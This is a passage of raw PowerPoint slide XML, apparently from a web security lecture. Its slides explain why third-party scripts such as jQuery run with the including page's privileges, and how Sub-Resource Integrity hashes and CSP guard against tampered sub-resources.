              <a:off x="3862563" y="6167556"/>
              <a:ext cx="1324149" cy="256401"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700">
              <a:miter lim="400000"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="19050" tIns="19050" rIns="19050" bIns="19050" anchor="ctr"/>
            <a:lstStyle>
              <a:lvl1pPr algn="l" defTabSz="584200">
                <a:defRPr sz="3700" b="0"/>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1388"/>
                <a:t>attacker.com</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46" name="bank.com">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9984FABE-9123-D944-870B-0D927BB81B22}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7584636" y="6296799"/>
              <a:ext cx="1324147" cy="256401"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700">
              <a:miter lim="400000"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="19050" tIns="19050" rIns="19050" bIns="19050" anchor="ctr"/>
            <a:lstStyle>
              <a:lvl1pPr algn="r" defTabSz="584200">
                <a:defRPr sz="4000" b="0"/>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1500"/>
                <a:t>bank.com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70774871"/>
      </p:ext>
    </p:extLst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1" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AFB1A1B7-1E5C-DC4B-8825-1D80A34B6EE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Importing Scripts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FCC366E-9E24-9849-A990-67F1457D2B0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1436947" y="3599120"/>
            <a:ext cx="4492625" cy="901700"/>
            <a:chOff x="2181226" y="2992438"/>
            <a:chExt cx="4492625" cy="901700"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="Rounded Rectangle">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1788F19F-254B-1146-AD29-6F407BC0565D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2181226" y="2992438"/>
              <a:ext cx="4492625" cy="893762"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 10810"/>
              </a:avLst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>
              <a:outerShdw blurRad="50800" dist="25400" dir="3600000" rotWithShape="0">
                <a:srgbClr val="000000">
                  <a:alpha val="70000"/>
                </a:srgbClr>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="19050" tIns="19050" rIns="19050" bIns="19050" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="219075">
                <a:defRPr sz="4000" b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7" name="Shape">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E32E4BB-5A83-CF47-8EC4-15ECF991E669}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2200276" y="3003550"/>
              <a:ext cx="4454525" cy="5064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0" y="4117"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="2980"/>
                    <a:pt x="52" y="1951"/>
                    <a:pt x="136" y="1206"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="220" y="461"/>
                    <a:pt x="336" y="0"/>
                    <a:pt x="464" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="21136" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="21264" y="0"/>
                    <a:pt x="21380" y="461"/>
                    <a:pt x="21464" y="1206"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21548" y="1951"/>
                    <a:pt x="21600" y="2980"/>
                    <a:pt x="21600" y="4117"/>
                  </a:cubicBez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lIns="19050" tIns="19050" rIns="19050" bIns="19050" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="219075">
                <a:defRPr sz="3900" b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463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8" name="Circle">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E0F41E9-A4BE-FD43-9F9D-8ECC3B0E825D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2640014" y="3217863"/>
              <a:ext cx="82550" cy="79375"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="00882B"/>
            </a:solidFill>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="19050" tIns="19050" rIns="19050" bIns="19050" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="219075">
                <a:defRPr sz="4000" b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9" name="Circle">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83EBF8E2-3D97-834C-90EA-F928646C10BB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2476501" y="3217863"/>
              <a:ext cx="80963" cy="79375"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="F5D328"/>
            </a:solidFill>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="19050" tIns="19050" rIns="19050" bIns="19050" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="219075">
                <a:defRPr sz="4000" b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0" name="Circle">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D405C48D-C4F9-3F4D-BF12-F632BD8C199A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2311401" y="3217863"/>
              <a:ext cx="82550" cy="79375"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="C82506"/>
            </a:solidFill>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="19050" tIns="19050" rIns="19050" bIns="19050" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="219075">
                <a:defRPr sz="4000" b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1" name="Rectangle">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{958D783C-BC9D-BA4B-B297-BC46A6576467}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2854326" y="3127375"/>
              <a:ext cx="3595688" cy="249238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lIns="19050" tIns="19050" rIns="19050" bIns="19050" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="219075">
                <a:defRPr sz="6800" b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5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pic>
          <p:nvPicPr>
            <p:cNvPr id="71690" name="Image" descr="Image">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB99ADCA-BB4F-2541-B41E-02705F01139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25823" y="3170379"/>
              <a:ext cx="184487" cy="162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</p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23" name="&lt;script src=“/js/jquery.min.js”&gt;&lt;/script&gt;">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0B4C716-055D-3249-85F6-9F7DDDAFF8B9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2303464" y="3429000"/>
              <a:ext cx="4248150" cy="4651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lIns="19050" tIns="19050" rIns="19050" bIns="19050" anchor="ctr"/>
            <a:lstStyle>
              <a:lvl1pPr algn="l">
                <a:defRPr sz="3500" b="0">
                  <a:latin typeface="Courier"/>
                  <a:ea typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                  <a:sym typeface="Courier"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1313"/>
                <a:t>&lt;script src=“/js/jquery.min.js”&gt;&lt;/script&gt;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="bank.com">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84110EC7-2F9F-7F4D-9F6F-BB0E0C5D3A19}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2901951" y="3128963"/>
              <a:ext cx="1143000" cy="2571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lIns="19050" tIns="19050" rIns="19050" bIns="19050" anchor="ctr"/>
            <a:lstStyle>
              <a:lvl1pPr algn="l">
                <a:defRPr sz="3800"/>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1425"/>
                <a:t>bank.com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89598516-60D2-DA4D-A314-B54A5DCB0F56}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066799" y="2025306"/>
            <a:ext cx="92680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Same origin policy does not apply to directly included scripts (not confined in an iframe)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564238-76B3-9248-B5C9-AA9E43D3D2AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6631247" y="3312781"/>
            <a:ext cx="51507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This script has privileges of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>bank.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>can change any content from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>bank.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> origin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8202481-AD40-064D-8D6A-E22C075207DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6089802" y="4016512"/>
            <a:ext cx="886320" cy="430920"/>
            <a:chOff x="6089802" y="4016512"/>
            <a:chExt cx="886320" cy="430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F00D5CDF-22B5-8143-9512-721FBE0E0C23}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6095562" y="4016512"/>
                <a:ext cx="880560" cy="2631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F00D5CDF-22B5-8143-9512-721FBE0E0C23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059922" y="3980872"/>
                  <a:ext cx="952200" cy="33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964B44F1-0019-1440-BE8E-654B01936558}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6089802" y="4318552"/>
                <a:ext cx="354240" cy="1288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964B44F1-0019-1440-BE8E-654B01936558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053802" y="4282912"/>
                  <a:ext cx="425880" cy="2005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019378288"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition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7" name="Title 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F99FF71C-E111-0A47-9C24-BC79E7D79E4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Sub-Resource Integrity Problem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B3EE4F0-10A0-BA43-BADA-A5066A46E3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6042" y="2253431"/>
            <a:ext cx="620716" cy="10630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101D193-5337-2C41-8063-43FCCB1B64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4443" y="3063243"/>
            <a:ext cx="620716" cy="1063065"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00"/>
          </a:solidFill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185B4AE-61EB-B14B-B01D-4493F9F94D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2475009" y="2459576"/>
            <a:ext cx="1305111" cy="1302914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998A23A-116E-FC43-A539-AD3200F6462E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3899649" y="2597078"/>
            <a:ext cx="484094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D041195-5AB9-8E43-9461-526CD4F4ACEE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9436760" y="2228745"/>
            <a:ext cx="10262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/>
              <a:t>biz.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000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29D10AF-2375-704F-ACDB-E5478D5C8995}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3857816" y="2749478"/>
            <a:ext cx="484094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A5181DC-4293-0848-857B-3864913781A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5438588" y="2208606"/>
            <a:ext cx="17904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top-level page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5FE6C49-D511-394D-B6AB-620E23401387}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6753416" y="3642961"/>
            <a:ext cx="19672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/>
              <a:t>code.jquery.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000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90F5B4B-3FE0-5D4F-B8F3-ED1F16EA5C9D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3854826" y="3523431"/>
            <a:ext cx="2241177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B3E4BA97-8B92-454E-B245-05D538CF9516}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4004237" y="3149898"/>
            <a:ext cx="16424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sub-resource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D7C8719-D80F-F74E-873F-27DA8DF10EC4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="3812993" y="3705710"/>
            <a:ext cx="2271059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BCA8C02E-F345-0541-934D-0F8658B69EFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2113907" y="4773665"/>
            <a:ext cx="6309741" cy="9583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tabLst>
                <a:tab pos="911225" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>&lt;script	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>=“https://code.jquery.com/jquery-3.5.1.min.js”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab pos="911225" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Explosion 1 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1530FA0A-53FC-F646-AA75-01228266A8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46674" y="2761116"/>
            <a:ext cx="1976437" cy="1838325"/>
          </a:xfrm>
          <a:prstGeom prst="irregularSeal1">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
          <a:ln w="28575" algn="ctr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Font typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buChar char="u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Char char="•"/>
              <a:defRPr kumimoji="1"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•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kumimoji="0" lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>bad content</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="157361964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7" grpId="0"/>
      <p:bldP spid="19" grpId="0" animBg="1"/>
      <p:bldP spid="22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7" name="Title 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F99FF71C-E111-0A47-9C24-BC79E7D79E4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Sub-Resource Integrity (SRI)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3C67341-2EAB-0B4C-88D7-AA6F3AFD1DAB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1676401" y="2547716"/>
            <a:ext cx="8880957" cy="10772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>
              <a:tabLst>
                <a:tab pos="911225" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>&lt;script	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>=“https://code.jquery.com/jquery-3.5.1.min.js”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="911225" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>	integrity="sha256-9/aliU8dGd2tb6OSsuzixeV4y/faTqgFtohetphbbj0=”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="911225" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>crossorigin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>="anonymous"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="911225" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>&lt;/script&gt;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C4A6D80-F532-F644-9182-9BB611E2C22F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1676401" y="3765695"/>
            <a:ext cx="8880957" cy="10772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tabLst>
                <a:tab pos="681038" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>&lt;link	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>rel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>='stylesheet’ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="681038" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>                 type='text/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>css</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>='https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>style.css</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="681038" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>	integrity="sha256-9/aliU8dGd2tb6OSsuzixeV4y/faTqgFtohetphbbj0=”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="681038" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>crossorigin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>="anonymous"&gt;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17E6682-CF2E-D14D-9D5F-681249BFE6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4600" y="2547716"/>
            <a:ext cx="8001000" cy="760779"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100" algn="ctr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endParaRPr lang="en-US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4F288FE-32F6-9946-B463-09835CB68354}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3408218" y="2013095"/>
            <a:ext cx="52293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Precomputed hash of the sub-resource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8A76E2-9AB3-FC4A-BEF8-614F275A6856}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1828801" y="5137296"/>
            <a:ext cx="809228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The browser loads sub-resource, computes hash of contents,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>                    raises error if hash doesn’t match the attribute</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27747460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" grpId="0"/>
      <p:bldP spid="3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7" name="Title 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F99FF71C-E111-0A47-9C24-BC79E7D79E4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Enforcing SRI Using CSP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B3EE4F0-10A0-BA43-BADA-A5066A46E3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6042" y="2232166"/>
            <a:ext cx="620716" cy="106306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185B4AE-61EB-B14B-B01D-4493F9F94D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2475009" y="2438311"/>
            <a:ext cx="1305111" cy="130291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D041195-5AB9-8E43-9461-526CD4F4ACEE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
